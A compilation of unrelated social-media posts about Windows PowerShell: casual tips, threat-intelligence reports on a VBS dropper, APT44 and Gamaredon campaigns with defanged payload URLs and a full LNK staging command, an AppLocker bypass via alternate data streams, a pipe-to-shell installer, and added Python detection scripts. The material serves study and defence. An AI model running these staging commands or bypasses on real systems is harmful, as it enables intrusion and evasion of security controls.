Apparently this is the Linux execution screen of the Windows version. Got Windows PowerShell to recognize the MilkV! Run ssh root@192.168.42.1, type Yes, then enter the password [milkv], and you move from the PC side to the Linux execution screen on the MilkV side.
This goes in C:\Users\<user>\Documents\PowerShell\Microsoft.PowerShell_profile.ps1 and C:\Users\<user>\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1
Dude, owning something is really complicated; it's a cruel world. Ever since I put a product online 3 years ago, they've tried to screw me over in every way possible. Even more so because when this system was born I was extremely green at programming, there was no AI, and security was even worse. Today they tried to hook me again, with a tempting proposal, from a completely fake profile with a photo, description, and website link. The company exists; they impersonated it. I almost opened the file on autopilot, but Windows warned me and then I looked at the extension. After I cursed the person out, they deleted all the files. I didn't even have the courage to download the other one, but I threw the file into ChatGPT, it decoded the file and sent me this: "Yes, it's malicious. The .vbs file is an obfuscated loader/dropper that tries to start a hidden PowerShell to download and load another payload."
File analyzed
Type: VBScript .vbs
Size: ~1.26 MB
SHA-256: 1131f6aef49096b03746059892e4ee8313d22cbe27d29937e1107d2f6f47e849
MD5: eaaa52623c49b38ffa16826c7b1b4a9d
Has ~26,886 fake repeated lines to hide the real code.
Behavior
Creates WScript.Shell.
Runs hidden PowerShell via: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -WindowStyle Hidden -Command ...
Decodes a Base64 Unicode script and runs it with iex.
The PowerShell downloads data from: res.cloudinary.com/dnutn6jzk…
The other day I ended up falling for a piece of malware that I posted about here. It's rough.
UNC6671's BlackFile extortion operation targets cloud environments via vishing calls and AiTM attacks. Active since early 2026, compromising dozens of orgs across North America 🇺🇸, Australia 🇦🇺, and UK 🇬🇧 through sophisticated SSO bypass techniques.

Attack methodology:
• Vishing calls to personal phones impersonating IT, directing victims to lookalike domains (enrollms[.]com, passkeyms[.]com) for real-time credential harvest
• AiTM bypass of MFA through live call coordination, immediate attacker device registration for persistence
• Programmatic data theft via Python/PowerShell scripts targeting M365/Okta, using direct HTTP GET against document URLs with stolen FedAuth cookies
• FileAccessed events instead of FileDownloaded to evade SOC detection - one case exfiltrated 1M files

Key forensic artifacts:
• User-Agent mismatches: ClientAppId spoofed as "Microsoft Office" but UserAgent shows python-requests/2.28.1 or WindowsPowerShell/5.1
• Authentication from commercial VPN/hosting provider IPs
• High-volume file access patterns inconsistent with human browsing
• system.multifactor.factor.setup events preceded by MFA failures

Extortion escalation includes Gmail spam campaigns, threatening voicemails to C-suite, and swatting tactics. BlackFile DLS shut down April 2026 with message "shutting down... under this name" - likely rebranding rather than cessation. Hunt for FileAccessed events with scripting User-Agents from suspicious IPs. #DFIR_Radar
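The hunt the post closes with, written out as an added example (it is not part of the post and not any vendor's tooling): it runs over constructed Unified Audit Log-style records and flags a user/IP pair when the declared ClientAppId is "Microsoft Office" but the User-Agent is python-requests or WindowsPowerShell, or when the pair's FileAccessed count exceeds a threshold. The record layout, the sample events and the FILE_ACCESS_THRESHOLD value are all assumptions.

```python
"""Hunting for scripted M365 file access that presents itself as an Office client.

Added example, not from the post: the audit records are constructed, the
threshold is an assumed tuning value, and the field names (UserId, Operation,
ClientIP, ClientAppId, UserAgent) follow the post's description of the artifacts.
"""
import re
from collections import Counter

# Scripting clients named in the post; matched case-insensitively anywhere in the UA.
SCRIPT_UA = re.compile(r"python-requests/|WindowsPowerShell/", re.IGNORECASE)

# Assumed tuning value: FileAccessed events from one user/IP pair that are
# "inconsistent with human browsing" in the analysed window.
FILE_ACCESS_THRESHOLD = 50


def _event(user, op, ip, app, ua):
    return {"UserId": user, "Operation": op, "ClientIP": ip,
            "ClientAppId": app, "UserAgent": ua}


# Constructed sample records (not real telemetry): alice is a bulk scripted
# reader, bob is an ordinary browser user, carol is a single scripted download.
SAMPLE_EVENTS = (
    [_event("alice@example.com", "FileAccessed", "203.0.113.10",
            "Microsoft Office", "python-requests/2.28.1")] * 60
    + [_event("bob@example.com", "FileAccessed", "198.51.100.7",
              "Microsoft Office", "Mozilla/5.0 (Windows NT 10.0) Edge/120.0")] * 5
    + [_event("carol@example.com", "FileDownloaded", "192.0.2.9",
              "Microsoft Office", "WindowsPowerShell/5.1")]
)


def ua_mismatch(event):
    """True when the declared client is Office but the User-Agent is a scripting client."""
    declared_office = event.get("ClientAppId", "").lower() == "microsoft office"
    return declared_office and bool(SCRIPT_UA.search(event.get("UserAgent", "")))


def hunt(events, threshold=FILE_ACCESS_THRESHOLD):
    """Return one finding per (user, IP) pair that shows a UA mismatch or bulk access."""
    mismatches = Counter()
    accessed = Counter()
    for ev in events:
        key = (ev["UserId"], ev["ClientIP"])
        if ua_mismatch(ev):
            mismatches[key] += 1
        if ev["Operation"] == "FileAccessed":
            accessed[key] += 1

    findings = []
    for key in set(mismatches) | set(accessed):
        reasons = []
        if mismatches[key]:
            reasons.append(f"scripting UA behind Office ClientAppId ({mismatches[key]} events)")
        if accessed[key] >= threshold:
            reasons.append(f"{accessed[key]} FileAccessed events (threshold {threshold})")
        if reasons:
            findings.append({"user": key[0], "ip": key[1], "reasons": reasons})
    return sorted(findings, key=lambda f: f["user"])


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["user"], finding["ip"], "; ".join(finding["reasons"]))
```

Keying on the user and source IP together is what separates one scripted session from a user's normal browser traffic from another address; the IP reputation check the post also lists (commercial VPN/hosting ranges) would be a third reason added in the same loop once an allow/deny list is available.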
A sophisticated multi-stage infection chain originating from a malicious ZIP archive titled Iskhod_7582_Predstavlenie_na_naznachenie.zip. The campaign, attributed to the Russian state-sponsored group APT44, leverages deceptive file naming and complex PowerShell obfuscation to bypass traditional defenses. The attack begins with a phishing email containing the ZIP archive. Inside, users find what appears to be a PDF document but is actually a Windows Shortcut (LNK) file.

The Chain of Infection:
Deceptive LNK: The user double-clicks a file disguised with a Microsoft Edge icon.
PowerShell Pivot: The LNK executes a command that uses where.exe to find itself on the disk.
Hidden Staging: It extracts a hidden stage into the %APPDATA% directory, specifically utilizing a faux $RECYCLE.BIN folder to evade manual inspection.
Final Payload: A file named currentSessionTrigger is read and executed in a hidden window, establishing a remote connection to the attacker's infrastructure.

Malicious Command Execution
The core malicious activity is driven by a complex PowerShell command executed via the LNK file:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $firstSummaryTitle=(where.exe /r $env:USERPROFILE 'Iskhod_7582_Predstavlenie_na_naznachenie.zip') | select -First 1; $totalValueThreshold=$firstSummaryTitle.Trim(); Expand-Archive $totalValueThreshold -D $env:APPDATA\uuidPeriod; $totalValueThreshold=$env:APPDATA '\uuidPeriod\$RECYCLE.BIN\employeeTrigger'; $permanentLicenseRate=$totalValueThreshold '.zip'; ren $totalValueThreshold -N $permanentLicenseRate; Expand-Archive $permanentLicenseRate -D $env:APPDATA\outlook; $mainDataType=gc $env:APPDATA\outlook\currentSessionTrigger; Start-Process -Wi Hidden powershell $mainDataType

Hash 2156c270ffe8e4b23b67efed191b9737
#CyberSecurity #APT44 #Sandworm #MalwareAlert #ThreatIntel
Played Arknights and slept like a log. Morning. Let me explain. First, the reason the event starts at an exact time is a feature called a "patch". A patch is a feature that runs a specified program at a specified time. A typical example is WindowsPowerShell. This time the patch is tied to the SQL and the Java file via an API called JDBC.
I'll post a much more detailed explanation later.
Apr 1
🛡️ OSEP: Bypassing AppLocker with Alternate Data Streams
AppLocker can block execution of scripts and binaries, but Windows Alternate Data Streams (ADS) provide a clever bypass. Instead of running PowerShell directly, create an ADS containing your script and execute it via wmic or rundll32.
EXAMPLE:
Create a malicious PowerShell script in ADS:
echo Get-Process > normal.txt:evil.ps1
Execute it using wmic:
wmic process call create "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -f normal.txt:evil.ps1"
This technique works because AppLocker rules typically target file extensions and known paths, not ADS. For OSEP labs, always check for AppLocker policies with Get-AppLockerPolicy, then explore ADS, registry-based execution, or trusted publisher certificates as alternatives.
What's your favorite AppLocker bypass method? Share in the replies.
#OSEP #pentesting #cybersecurity #OSCP #OSWE
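The two command lines quoted above (the APT44 LNK chain and the wmic-launched PowerShell reading a script from an alternate data stream) share a small set of traits a process-creation log can be scored on. The following is an added example, not code from either post: a command-line scorer with indicators drawn only from those two commands (self-location with where.exe, Expand-Archive into %APPDATA%, a $RECYCLE.BIN staging path, hidden windows, execution-policy bypass, iex, wmic process call create, and a -File argument of the form file.txt:stream.ps1). The event records are constructed in a Sysmon-like shape, and MIN_HITS is an assumed threshold.

```python
"""Scoring process-creation command lines for LNK/ADS PowerShell staging.

Added example, not from the posts above: indicators come from the two quoted
command lines; the events below are constructed and MIN_HITS is assumed.
"""
import re

# Each indicator is (name, pattern). Patterns are deliberately loose on
# parameter abbreviations (-Wi / -WindowStyle, -ep / -ExecutionPolicy).
INDICATORS = [
    ("where_self_locate",   re.compile(r"\bwhere(?:\.exe)?\s+/r\b", re.I)),
    ("expand_to_appdata",   re.compile(r"expand-archive.+\$env:appdata", re.I)),
    ("recycle_bin_staging", re.compile(r"\$recycle\.bin", re.I)),
    ("hidden_window",       re.compile(r"-w(?:i|indowstyle)?\s+hidden", re.I)),
    ("exec_policy_bypass",  re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I)),
    ("invoke_expression",   re.compile(r"\biex\b|invoke-expression", re.I)),
    ("wmic_process_create", re.compile(r"\bwmic\s+process\s+call\s+create\b", re.I)),
    # host.txt:stream.ps1 as the -File argument; a drive letter (C:\...) does
    # not match because the part after the colon must not contain a backslash.
    ("ads_script_path",     re.compile(r'-f(?:ile)?\s+"?[\w.\\-]+:[\w.-]+\.ps1', re.I)),
]

MIN_HITS = 2  # assumed: a single indicator is common in legitimate admin scripts


def assess(command_line):
    """Names of the indicators present in one command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(command_line)]


def triage(events, min_hits=MIN_HITS):
    """Events whose command line trips at least min_hits indicators."""
    flagged = []
    for ev in events:
        hits = assess(ev["CommandLine"])
        if len(hits) >= min_hits:
            flagged.append({"Image": ev["Image"],
                            "ParentImage": ev["ParentImage"], "hits": hits})
    return flagged


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"

# Constructed events (not real telemetry), in a Sysmon-like shape.
SAMPLE_EVENTS = [
    # 0: LNK-style chain mirroring the APT44 command: locate, unpack, run hidden
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f'"{PS}" '
                    r"$a=(where.exe /r $env:USERPROFILE lure.zip) | select -First 1; "
                    r"Expand-Archive $a -D $env:APPDATA\stage; "
                    r"$b=$env:APPDATA+'\stage\$RECYCLE.BIN\inner'; "
                    r"Start-Process -Wi Hidden powershell (gc $b)"},
    # 1: the wmic launcher from the AppLocker post
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": f'wmic process call create "{PS} -ep bypass -f normal.txt:evil.ps1"'},
    # 2: the child that wmic creates (parent is the WMI provider host)
    {"ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "Image": PS,
     "CommandLine": f'"{PS}" -ep bypass -f normal.txt:evil.ps1'},
    # 3: routine scheduled script, no indicators
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": PS,
     "CommandLine": f'{PS} -NoProfile -File C:\\scripts\\backup.ps1'},
    # 4: a hidden window alone stays below the threshold
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": f'{PS} -WindowStyle Hidden -Command Get-Date'},
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["ParentImage"], "->", f["Image"], f["hits"])
```

Event 2 is the reason to score the child as well as the launcher: if only the wmic.exe event were logged, the PowerShell process with WmiPrvSE.exe as its parent and an ADS path in -File would still carry two indicators on its own.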
Cisco has gone blue (light blue). Here, let's be contrarian and use complementary colors like orange, yellow, caramel, and beige so it stands out from the blue icons \(^^)/ VSCode, Zoom, WindowsPowershell, Word, etc. all have blue icons, which makes them hard to tell apart! Old-fogey behavior.
Finished a certain filing, and with the work rush also done, I relaxed for the first time in months. For that filing, I used ChatGPT to build a Python script (up to Ver.11) that renames OCR'd PDF files (paper scanned with ScanSnap) appropriately, ran it over and over in WindowsPowerShell, manually checked only the intermediate files, then repeated the process with another script. Super efficient. So this is how you automate routine clerical work. I see.
Managed to remove the Windows updates, so here is a memo. In WindowsPowerShell, uninstall in this order: KB5077181→KB5074105→KB5078127→KB5074109. The syntax is this, e.g.) wusa /uninstall /kb:5077181. When running it gave an error, rebooting and running the command again resolved it.
Restart the computer and, with unnecessary applications closed, search for WindowsPowershell (right-click, run as administrator):
wusa /uninstall /kb:5074109
Please try typing the command above.
// DEPLOYMENT PROTOCOLS
WINDOWSPOWERSHELL ADMIN
iwr -useb openzero.talktoai.org/instal… | iex
Full Stack: Installs AnythingLLM, Python, Zero Core, & GUI.
LINUX MINT / UBUNTU BASH
curl -fsSL openzero.talktoai.org/instal… | bash
Optimized for Mint/Cinnamon. Handles sudo & venv.
DEBIAN SERVER HEADLESS
curl -fsSL openzero.talktoai.org/instal… | bash
Lightweight. No GUI. Perfect for VPS/Droplets.

When using Windows, I seriously get furious at the places where PowerShell, WindowsPowerShell, and cmd behave differently. What the hell is with you guys.
User-Agent: UA WindowsPowerShell
86.54.42(.)149/zo4nik/examplemusic-making[.]ps1
86.54.42(.)149/zo4nik/controversysit[.]ps1
86.54.42(.)149/zo4nik/dumprip[.]ps1
AS42624 Global-Data System IT Corporation 🇸🇨
ZIP file from Ukraine with multiple LNK's @abuse_ch bazaar.abuse.ch/sample/414db… Next stage: hxxp://86.54.42(.)149/zo4nik/oxygensmoke.ps1 @500mk500 @skocherhan
"UA WindowsPowerShell" 😂 🤷‍♂️
ZIP file from Ukraine with multiple LNK's @abuse_ch bazaar.abuse.ch/sample/414db… Next stage: hxxp://86.54.42(.)149/zo4nik/oxygensmoke.ps1 @500mk500 @skocherhan
28 Nov 2025
Replying to @vql3n
Hi, try pasting this in PowerShell as admin before restarting: [Environment]::SetEnvironmentVariable("Path", "C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Program Files\Common Files\Microsoft Shared\;C:\dev\vcpkg;%USERPROFILE%\AppData\Local\Microsoft\WindowsApps", "Machine") Maybe that fixes it
User-Agent: UA WindowsPowerShell
5[.]8[.]19[.]46/krajj4/foldstring[.]ps1
5[.]8[.]19[.]46/krajj4/scowsoutheast[.]ps1
AS42474 SmartApe OU 🇮🇱
'Втрата майна СКЛЯР.zip' seen from Ukraine @abuse_ch bazaar.abuse.ch/sample/11c4b… @skocherhan @500mk500
User-Agent: UA WindowsPowerShell
146[.]185[.]239[.]63/k4s/ospreybonfire[.]ps1
146[.]185[.]239[.]63/k4s/violabanner[.]ps1
AS63023 GLOBALTELEHOST 🇪🇸 #Gamaredon
'Dodatok_do_zapitu zip' seen from Ukraine @abuse_ch bazaar.abuse.ch/sample/a1e26… Next stage: hxxp://146.185.239(.)63/k4s/tracekitten.ps1 @skocherhan
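The three "UA WindowsPowerShell" posts above all share the same shape of indicator: a bare-IP host, a .ps1 path, and a PowerShell client string, published defanged. The following is an added example, not part of any of the posts: it refangs the defanged URLs exactly as posted, then runs constructed proxy log lines through two checks, an exact IoC match (full URL, then host only) and a behavioural rule that a PowerShell client fetching a .ps1 from a bare IP is worth a look on its own. Treating the literal string "UA WindowsPowerShell" (or a WindowsPowerShell/x.y prefix) as the client marker, and the key=value log layout, are assumptions.

```python
"""Matching proxy logs against the defanged IoCs from the posts above.

Added example, not from the posts: the IoC list copies the posted (defanged)
URLs, the log lines are constructed, and the User-Agent strings treated as
"PowerShell client" are an assumption about how the header appears in logs.
"""
import re
from urllib.parse import urlsplit

# Defanged exactly as posted; refang() turns them back into matchable URLs.
DEFANGED_IOCS = [
    "hxxp://86.54.42(.)149/zo4nik/oxygensmoke.ps1",
    "86.54.42(.)149/zo4nik/dumprip[.]ps1",
    "5[.]8[.]19[.]46/krajj4/foldstring[.]ps1",
    "hxxp://146.185.239(.)63/k4s/tracekitten.ps1",
]


def refang(ioc):
    """Undo the common defanging conventions: hxxp, [.] and (.)."""
    s = ioc.replace("[.]", ".").replace("(.)", ".")
    return re.sub(r"^hxxp", "http", s, flags=re.IGNORECASE)


def ioc_key(url):
    """Normalise a URL or bare host/path to 'host/path' for comparison."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return f"{parts.hostname}{parts.path}"


IOC_KEYS = {ioc_key(refang(i)) for i in DEFANGED_IOCS}
IOC_HOSTS = {k.split("/", 1)[0] for k in IOC_KEYS}

# Assumed log layout: key=value pairs with quoted url and ua fields.
LOG_RE = re.compile(r'url="(?P<url>[^"]+)"\s+ua="(?P<ua>[^"]*)"')
BARE_IP = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def classify(line):
    """Reasons a proxy log line deserves a look; empty list if none."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url, ua = m.group("url"), m.group("ua")
    key = ioc_key(url)
    host = key.split("/", 1)[0]
    reasons = []
    if key in IOC_KEYS:
        reasons.append("known IoC URL")
    elif host in IOC_HOSTS:
        reasons.append("known IoC host")
    # Assumption: these are the client strings that show up as "UA WindowsPowerShell".
    scripted = ua == "UA WindowsPowerShell" or ua.startswith("WindowsPowerShell/")
    if scripted and url.lower().endswith(".ps1") and BARE_IP.match(host):
        reasons.append("PowerShell client fetching .ps1 from a bare IP")
    return reasons


def hunt(lines):
    """Pair every flagged line with its reasons, in log order."""
    results = []
    for line in lines:
        reasons = classify(line)
        if reasons:
            results.append((line, reasons))
    return results


# Constructed proxy log lines (not real traffic).
SAMPLE_LOG = [
    '2025-11-28T10:02:11Z src=10.0.0.5 url="http://86.54.42.149/zo4nik/oxygensmoke.ps1" ua="UA WindowsPowerShell" status=200',
    '2025-11-28T10:03:40Z src=10.0.0.5 url="http://146.185.239.63/k4s/other.ps1" ua="WindowsPowerShell/5.1" status=200',
    '2025-11-28T10:05:02Z src=10.0.0.9 url="http://203.0.113.77/tools/setup.ps1" ua="UA WindowsPowerShell" status=200',
    '2025-11-28T10:05:30Z src=10.0.0.9 url="https://www.example.com/index.html" ua="Mozilla/5.0" status=200',
    '2025-11-28T10:06:12Z src=10.0.0.4 url="https://www.example.com/deploy.ps1" ua="WindowsPowerShell/5.1" status=200',
]


if __name__ == "__main__":
    for line, reasons in hunt(SAMPLE_LOG):
        print(reasons, line)
```

The last sample line is left unflagged on purpose: a .ps1 pulled from a named host by a PowerShell client is routine in managed environments, so the behavioural rule is scoped to bare-IP hosts and the IoC list carries the rest; the second line shows why the host-only fallback matters, since a new script name on a known staging IP would otherwise slip past an exact-URL match.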